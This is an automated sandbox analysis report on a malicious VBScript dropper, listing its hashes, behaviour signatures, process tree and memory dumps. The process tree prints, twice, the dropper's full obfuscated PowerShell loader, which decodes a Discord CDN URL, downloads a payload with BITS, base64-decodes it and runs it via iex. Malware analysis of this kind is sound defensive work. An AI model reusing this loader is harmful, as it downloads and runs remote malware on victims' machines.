0ee699b7df38822530b27f92eeb59904b6c580003c8e4c5e1cf675150873b2e2

General

Target

23-72688-BL.vbs
Size

54KB
MD5

554c7cdfb4d20ed4ad52df3f33add1a6
SHA1

a480031e70d5eb20cdb369817dcf7a34ea17846c
SHA256

218df187d09574437927ec74bb7e6c0d956e184d7051a17e9d14634772c75d18
SHA512

032689abe377d71f7057e59ebc8a47c4102785478cf414a6bfffb08a5ebb471e0758208a9a14c09e4030a8aad3b1e4cf21fcd16605f0f8872cb95525e5b71fd0
SSDEEP

1536:jTJBx+7Jf6nPkBTvHqACkGdLzTtHwNZWqlidzcO4bf:PJBx+7JCPI7HqAClLzTpwNZWq8dgDbf

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2716	powershell.exe
2880	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2716	powershell.exe
Token: SeDebugPrivilege	2880	powershell.exe

Suspicious use of WriteProcessMemory 7 IoCs

description	pid	Process	procid_target
PID 2388 wrote to memory of 2716	2388	WScript.exe	29
PID 2388 wrote to memory of 2716	2388	WScript.exe	29
PID 2388 wrote to memory of 2716	2388	WScript.exe	29
PID 2716 wrote to memory of 2880	2716	powershell.exe	31
PID 2716 wrote to memory of 2880	2716	powershell.exe	31
PID 2716 wrote to memory of 2880	2716	powershell.exe	31
PID 2716 wrote to memory of 2880	2716	powershell.exe	31

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\23-72688-BL.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2388
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Uslg9 ([String]$Helnodesdi){$Misa = $Helnodesdi.Length;For($Tensiont=4; $Tensiont -lt $Misa-1; $Tensiont+=5){$Fugle=$Fugle+$Helnodesdi.Substring( $Tensiont, 1)};$Fugle;}$Regningens17=Uslg9 'TvrthItchtRammt CadpDecosZoon: Bus/Vola/ BancappadJunknKonc.DesidVitriGowdslixvcAfvao tenrSpacdTipsaTrolpLearpSopr.Weirc SkyoingemWats/ ReaaTilstMasotBaanaphthcAdeqhTeknmForme unsnFeltt indsAkti/Coti1Mell1stra6Udes5Imag7Arch5Semi5Sago3 Hor0 Med8Deba3outf7Vegh5Unde8Falc1Afsk0Lopp2Dryn5Reto4Swoo/Raja1Spri1Topc6Ungr6Sigm5Jobb2Teat1Haci2Trst0Anti9Serv3Axmi3Lapa3 Ops2Inqu3Brug9Gste8Klub5Flkn8 Bil/TnkeR BemiVarrgHistlBundeForst DecsCoha.PavemAcondSnowpBego?BhmaeUnubx ref=Emul6Inte5Akut4OnisaStrocKjolaSupp8Skid9Gart&StomiPneusundi= Eur6 Ter5Regi3Form8Baal5Udst5Crum8 Ove9 wag& SubhSoapmdysy=Inte2Lini6Mons5Base2Over0ParcbPost5DevofSlaa6 Udp2Dzer9 Vejckick7 Pee0Rske4Udbe8Over9PrepfBlre0Bnde0KineaTokr4Erhv4 Wea0Trabcslvtc Undd Chl6Spri2Drog4Barb7Oste3Sprod Sil6Frsn3 Tal5unad5KvleeStar5Beau4Blegf Tou3Fjer1Sign3ChanfGokaePyro8 VoldLocu3Coen7Genf0Fluea Tra0ValgaBogb9Atom3 Sub8 Ire1 magbJayw7ReseeScireSkuf5Lapc6 Agr&Ento ';$Bhimau=$Regningens17.split([char]62);$Regningens17=$Bhimau[0];$Fugle01=Uslg9 'MuddiHypeeTaksxMilj ';$Assau43 = Uslg9 'Arbe\FilhsWambyunifsBoliwStoroKrftwPylo6Inte4linc\baldWArbeiMacenTreed Croo GocwDisisPeriPIchtoYppewSpaseModurFilsSFragh skneAfbllKittl rrh\blenvLeud1Fnsp.Fert0Giga\DesspFemaoStivwUrime Vanr HomshollhMelleDrejlEksplAnag.ChareAligxjapheBygn '; . ($Fugle01) (Uslg9 'Tack$ FriPSysteAkoan FornFroseMeta2Dupl=Undv$Risoe GtenNondvVerb:NdriwPolaiBarynReacdUddai Artr War ') ; & ($Fugle01) (Uslg9 'Hete$FinaAScops HexsRedua OttuFlat4Fint3Shie=Ejen$HypaPVanveAgronNecrnJhureVoli2Ande+Slag$GudeAJorys DubspseuaPrghudata4rubr3 Kny ') ; & ($Fugle01) (Uslg9 'Ooge$ LacAGammgInsuelearnFodrd LeaeFarv Betr= Uni Cano(Fluk(BiligJunkwRentmLowaiInds GaffwSundiOvern Dis3Germ2Afsn_ThirpKhvarRrknoFortcBorteSharsDovnsBest Tard-DoveFAfte AsbePSovsrBlenoColocFleleRetesUnshsEgnsIRivad Wie=Nedr$Fors{BahaP LanITastDFain}Rasc)Fell.SitaC ClaoPolymSprymFungaopspn Squd AvlLMelliVlgenRetueelec)iter Omre- RegsBarbp MorlLadyiFlyvtBaje Good[EpoxcGlash MecaNarkrHjre]Cyri3 Sta4 Ber '); . ($Fugle01) (Uslg9 'plur$UdpiHStdpaGlyccHummkcollmAbstaCoch Empa=Unde Daa$VealA BesgWeileIglonInted ArbeHvde[Four$SbyeAUdesgCuryeDagnnUndedUnreeKoma.Nilmc GenoSuprusubrn brutLaun-Bals2 Fal]Tmre '); . ($Fugle01) (Uslg9 'Pash$svejAProjl IntgNeore SlibDess=milj(SupeTsnereTjurs AmbtUdsl- DyrPBlyda HamtFlathMale Tryk$PediADendsseris erha BliuVolt4Josf3Petu)Grum krep-EmpoAAandn lakdFors Land(Cipp[BlreI FugnTrantSnouPGeopt PasrSabb]dode:Udda:KlipsSkoviMarlz UoreSkif Feli-ForbeKultqDobl For8Refo)Croc ') ;if ($Algeb) {.$Assau43 $Hackma;} else {;$Fugle00=Uslg9 'PareSStedtNyheaDryfrBanntLega-EfteBEnoliSpontAnims HalTsprjrBodyaSkrunHymnsBlotf BoueAktirMedr Unmo-CarnSCruboSoeguUoverPrvecParaeChar Isoc$DemaRPenneUndegKoran StriPlann untg PsyeBlusnDripsSpol1Punt7Angu Frdi-AbstDForseForgsMelltotzeiUpsen Anta InttRubbi Blio stin Vej Umor$ PerPUndeeForpnBillnAfbaeInte2unva '; . ($Fugle01) (Uslg9 'Brnd$HuenPChrieUmornReprnChene Dee2styr=Sacr$ RemeUomgnNostvFork:udviaAdrepHumopDelodkontaunrat Nona Skv ') ; & ($Fugle01) (Uslg9 ' IdoISequmhydrpKystoToadrGodttStjg-BireMEtiooSexddConvu SprlNonieSuni ZizsBfilmiPhiltMisssSadeTMedfradopaShelnSkrusupbufpterePresr sim ') ;$Penne2=$Penne2+'\Afregnesst.Tri'; & ($Fugle01) (Uslg9 'Srac$MinsTFrarjLibar VernUdpueferrbChilr pirrMinee MennCoun= Gan(PleuT BeeeSchesNephtSikk- CadPErobaMidtt HjlhPres Tils$FodrP OrteBehonHavdncoupeEner2 Den)Over ') ;while (-not $Tjrnebrren) { & ($Fugle01) (Uslg9 'Dysm$ kriTPolyjOdonrPraen PheevatibBranrSockrHumreSkrinIlli=univ( KruTskoleVarss dautHyph-BurmPGameaOmtyt AmbhTjat Ster$OpdaPBuree Bren StonLurveGrou2Arbi)Inst ') ; & ($Fugle01) $Fugle00; & ($Fugle01) (Uslg9 'ChikSCadltMonuagenarRepetBila-VildShistlSydaeKoipe angpFndr Juth5Avis ');$Regningens17=$Bhimau[$Nonesthe++%$Bhimau.count];}. ($Fugle01) (Uslg9 ' Atl$PlatUHreasShellwiregUlvs Albu= Flj MoriGBltse ChatOffi-BurkCSukkoRetuntorctForaeSelvnEnmatBarn Stud$EcbsPMatieRecunExcenParaeBeau2 Aba ');& ($Fugle01) (Uslg9 'tiss$PyloFSideu IndgCorytmultiAccegEpitkRenkoSkra9Mohi0Part Spar=mari Over[blacSDephyNocasPreatParaeKardmPros.ClivCSpryoCholnSpilv TaneBlacrOffdtNond]Cbsa: hoo:UnscF RunrStemoServm DraBsanda Stes SubeBebu6Panl4HalvSDecotSiderbucciBihunNeakgTalv( Dis$HoveUhanksbibblBenyg Mel)Buff '); & ($Fugle01) (Uslg9 'Land$SunsFTarvu Nocg LejlMetoeKage2hdwe Rekt=Inam Brug[AfvaSLibryLilysUncatAuaneOmdemNeol.DilaT GiveSidexLingt Sig.OpgrESupenEndocGreeo Smid AngiFromnCancgBlas] Sko:Serr:LonnAAfskSKlimCStomIrrliIUgre.MetrGConseKvadtoverSCrettSeleralleiTrven Blog Neu(Tilt$PaasFFumlu LetgTvrstSymbiPagagBreakSovioKred9Disk0 Bla)Etan '); . ($Fugle01) (Uslg9 'Bowf$ KarFPannoDorscbrsnuMishs Morsceri=Para$ DecFForfuprofgElshlUnpleAzur2 Opt. TecsStoruBillb Svms AcitHolorsvovi UglnSweag Met(Uhan2Afsk8Poly2Ledg7 Pha7 Bod9Budu, Fre2Cryp3 Aan0Pers9Remu5phym) Aff '); . ($Fugle01) $Focuss;}"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2716
- - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Uslg9 ([String]$Helnodesdi){$Misa = $Helnodesdi.Length;For($Tensiont=4; $Tensiont -lt $Misa-1; $Tensiont+=5){$Fugle=$Fugle+$Helnodesdi.Substring( $Tensiont, 1)};$Fugle;}$Regningens17=Uslg9 'TvrthItchtRammt CadpDecosZoon: Bus/Vola/ BancappadJunknKonc.DesidVitriGowdslixvcAfvao tenrSpacdTipsaTrolpLearpSopr.Weirc SkyoingemWats/ ReaaTilstMasotBaanaphthcAdeqhTeknmForme unsnFeltt indsAkti/Coti1Mell1stra6Udes5Imag7Arch5Semi5Sago3 Hor0 Med8Deba3outf7Vegh5Unde8Falc1Afsk0Lopp2Dryn5Reto4Swoo/Raja1Spri1Topc6Ungr6Sigm5Jobb2Teat1Haci2Trst0Anti9Serv3Axmi3Lapa3 Ops2Inqu3Brug9Gste8Klub5Flkn8 Bil/TnkeR BemiVarrgHistlBundeForst DecsCoha.PavemAcondSnowpBego?BhmaeUnubx ref=Emul6Inte5Akut4OnisaStrocKjolaSupp8Skid9Gart&StomiPneusundi= Eur6 Ter5Regi3Form8Baal5Udst5Crum8 Ove9 wag& SubhSoapmdysy=Inte2Lini6Mons5Base2Over0ParcbPost5DevofSlaa6 Udp2Dzer9 Vejckick7 Pee0Rske4Udbe8Over9PrepfBlre0Bnde0KineaTokr4Erhv4 Wea0Trabcslvtc Undd Chl6Spri2Drog4Barb7Oste3Sprod Sil6Frsn3 Tal5unad5KvleeStar5Beau4Blegf Tou3Fjer1Sign3ChanfGokaePyro8 VoldLocu3Coen7Genf0Fluea Tra0ValgaBogb9Atom3 Sub8 Ire1 magbJayw7ReseeScireSkuf5Lapc6 Agr&Ento ';$Bhimau=$Regningens17.split([char]62);$Regningens17=$Bhimau[0];$Fugle01=Uslg9 'MuddiHypeeTaksxMilj ';$Assau43 = Uslg9 'Arbe\FilhsWambyunifsBoliwStoroKrftwPylo6Inte4linc\baldWArbeiMacenTreed Croo GocwDisisPeriPIchtoYppewSpaseModurFilsSFragh skneAfbllKittl rrh\blenvLeud1Fnsp.Fert0Giga\DesspFemaoStivwUrime Vanr HomshollhMelleDrejlEksplAnag.ChareAligxjapheBygn '; . ($Fugle01) (Uslg9 'Tack$ FriPSysteAkoan FornFroseMeta2Dupl=Undv$Risoe GtenNondvVerb:NdriwPolaiBarynReacdUddai Artr War ') ; & ($Fugle01) (Uslg9 'Hete$FinaAScops HexsRedua OttuFlat4Fint3Shie=Ejen$HypaPVanveAgronNecrnJhureVoli2Ande+Slag$GudeAJorys DubspseuaPrghudata4rubr3 Kny ') ; & ($Fugle01) (Uslg9 'Ooge$ LacAGammgInsuelearnFodrd LeaeFarv Betr= Uni Cano(Fluk(BiligJunkwRentmLowaiInds GaffwSundiOvern Dis3Germ2Afsn_ThirpKhvarRrknoFortcBorteSharsDovnsBest Tard-DoveFAfte AsbePSovsrBlenoColocFleleRetesUnshsEgnsIRivad Wie=Nedr$Fors{BahaP LanITastDFain}Rasc)Fell.SitaC ClaoPolymSprymFungaopspn Squd AvlLMelliVlgenRetueelec)iter Omre- RegsBarbp MorlLadyiFlyvtBaje Good[EpoxcGlash MecaNarkrHjre]Cyri3 Sta4 Ber '); . ($Fugle01) (Uslg9 'plur$UdpiHStdpaGlyccHummkcollmAbstaCoch Empa=Unde Daa$VealA BesgWeileIglonInted ArbeHvde[Four$SbyeAUdesgCuryeDagnnUndedUnreeKoma.Nilmc GenoSuprusubrn brutLaun-Bals2 Fal]Tmre '); . ($Fugle01) (Uslg9 'Pash$svejAProjl IntgNeore SlibDess=milj(SupeTsnereTjurs AmbtUdsl- DyrPBlyda HamtFlathMale Tryk$PediADendsseris erha BliuVolt4Josf3Petu)Grum krep-EmpoAAandn lakdFors Land(Cipp[BlreI FugnTrantSnouPGeopt PasrSabb]dode:Udda:KlipsSkoviMarlz UoreSkif Feli-ForbeKultqDobl For8Refo)Croc ') ;if ($Algeb) {.$Assau43 $Hackma;} else {;$Fugle00=Uslg9 'PareSStedtNyheaDryfrBanntLega-EfteBEnoliSpontAnims HalTsprjrBodyaSkrunHymnsBlotf BoueAktirMedr Unmo-CarnSCruboSoeguUoverPrvecParaeChar Isoc$DemaRPenneUndegKoran StriPlann untg PsyeBlusnDripsSpol1Punt7Angu Frdi-AbstDForseForgsMelltotzeiUpsen Anta InttRubbi Blio stin Vej Umor$ PerPUndeeForpnBillnAfbaeInte2unva '; . ($Fugle01) (Uslg9 'Brnd$HuenPChrieUmornReprnChene Dee2styr=Sacr$ RemeUomgnNostvFork:udviaAdrepHumopDelodkontaunrat Nona Skv ') ; & ($Fugle01) (Uslg9 ' IdoISequmhydrpKystoToadrGodttStjg-BireMEtiooSexddConvu SprlNonieSuni ZizsBfilmiPhiltMisssSadeTMedfradopaShelnSkrusupbufpterePresr sim ') ;$Penne2=$Penne2+'\Afregnesst.Tri'; & ($Fugle01) (Uslg9 'Srac$MinsTFrarjLibar VernUdpueferrbChilr pirrMinee MennCoun= Gan(PleuT BeeeSchesNephtSikk- CadPErobaMidtt HjlhPres Tils$FodrP OrteBehonHavdncoupeEner2 Den)Over ') ;while (-not $Tjrnebrren) { & ($Fugle01) (Uslg9 'Dysm$ kriTPolyjOdonrPraen PheevatibBranrSockrHumreSkrinIlli=univ( KruTskoleVarss dautHyph-BurmPGameaOmtyt AmbhTjat Ster$OpdaPBuree Bren StonLurveGrou2Arbi)Inst ') ; & ($Fugle01) $Fugle00; & ($Fugle01) (Uslg9 'ChikSCadltMonuagenarRepetBila-VildShistlSydaeKoipe angpFndr Juth5Avis ');$Regningens17=$Bhimau[$Nonesthe++%$Bhimau.count];}. ($Fugle01) (Uslg9 ' Atl$PlatUHreasShellwiregUlvs Albu= Flj MoriGBltse ChatOffi-BurkCSukkoRetuntorctForaeSelvnEnmatBarn Stud$EcbsPMatieRecunExcenParaeBeau2 Aba ');& ($Fugle01) (Uslg9 'tiss$PyloFSideu IndgCorytmultiAccegEpitkRenkoSkra9Mohi0Part Spar=mari Over[blacSDephyNocasPreatParaeKardmPros.ClivCSpryoCholnSpilv TaneBlacrOffdtNond]Cbsa: hoo:UnscF RunrStemoServm DraBsanda Stes SubeBebu6Panl4HalvSDecotSiderbucciBihunNeakgTalv( Dis$HoveUhanksbibblBenyg Mel)Buff '); & ($Fugle01) (Uslg9 'Land$SunsFTarvu Nocg LejlMetoeKage2hdwe Rekt=Inam Brug[AfvaSLibryLilysUncatAuaneOmdemNeol.DilaT GiveSidexLingt Sig.OpgrESupenEndocGreeo Smid AngiFromnCancgBlas] Sko:Serr:LonnAAfskSKlimCStomIrrliIUgre.MetrGConseKvadtoverSCrettSeleralleiTrven Blog Neu(Tilt$PaasFFumlu LetgTvrstSymbiPagagBreakSovioKred9Disk0 Bla)Etan '); . ($Fugle01) (Uslg9 'Bowf$ KarFPannoDorscbrsnuMishs Morsceri=Para$ DecFForfuprofgElshlUnpleAzur2 Opt. TecsStoruBillb Svms AcitHolorsvovi UglnSweag Met(Uhan2Afsk8Poly2Ledg7 Pha7 Bod9Budu, Fre2Cryp3 Aan0Pers9Remu5phym) Aff '); . ($Fugle01) $Focuss;}"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2880

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PX4BHI3S7J3F0NB2E3JS.temp

Filesize
7KB

MD5
4283a4f8d80fed886c5fcebfb730eb3a

SHA1
08a87ae60d893f79e6a8cfa83afd41f7594a52d6

SHA256
bf77806142aff7b05f3575ac7d4b641856e6e8920574df01db597b73d908173a

SHA512
bb5eefc44a6d82c3b91f2466073f44d4659c245548db1f9d72b54e6d1ad99323a22d30aa6573c2592c4ddd191f1d50ebd719053de21e7a06195aadeae83a251e

Download Submit
memory/2716-26-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp

Filesize
9.6MB

Download
memory/2716-7-0x00000000029B0000-0x0000000002A30000-memory.dmp

Filesize
512KB

Download
memory/2716-30-0x00000000029B0000-0x0000000002A30000-memory.dmp

Filesize
512KB

Download
memory/2716-29-0x00000000029B0000-0x0000000002A30000-memory.dmp

Filesize
512KB

Download
memory/2716-10-0x00000000029B0000-0x0000000002A30000-memory.dmp

Filesize
512KB

Download
memory/2716-9-0x00000000029B0000-0x0000000002A30000-memory.dmp

Filesize
512KB

Download
memory/2716-5-0x0000000002570000-0x0000000002578000-memory.dmp

Filesize
32KB

Download
memory/2716-28-0x00000000029B0000-0x0000000002A30000-memory.dmp

Filesize
512KB

Download
memory/2716-27-0x00000000029B0000-0x0000000002A30000-memory.dmp

Filesize
512KB

Download
memory/2716-6-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp

Filesize
9.6MB

Download
memory/2716-8-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp

Filesize
9.6MB

Download
memory/2716-4-0x000000001B1A0000-0x000000001B482000-memory.dmp

Filesize
2.9MB

Download
memory/2880-32-0x0000000002610000-0x0000000002650000-memory.dmp

Filesize
256KB

Download
memory/2880-15-0x0000000002610000-0x0000000002650000-memory.dmp

Filesize
256KB

Download
memory/2880-16-0x0000000002610000-0x0000000002650000-memory.dmp

Filesize
256KB

Download
memory/2880-13-0x0000000073420000-0x00000000739CB000-memory.dmp

Filesize
5.7MB

Download
memory/2880-31-0x0000000073420000-0x00000000739CB000-memory.dmp

Filesize
5.7MB

Download
memory/2880-14-0x0000000073420000-0x00000000739CB000-memory.dmp

Filesize
5.7MB

Download

Analysis

Sharing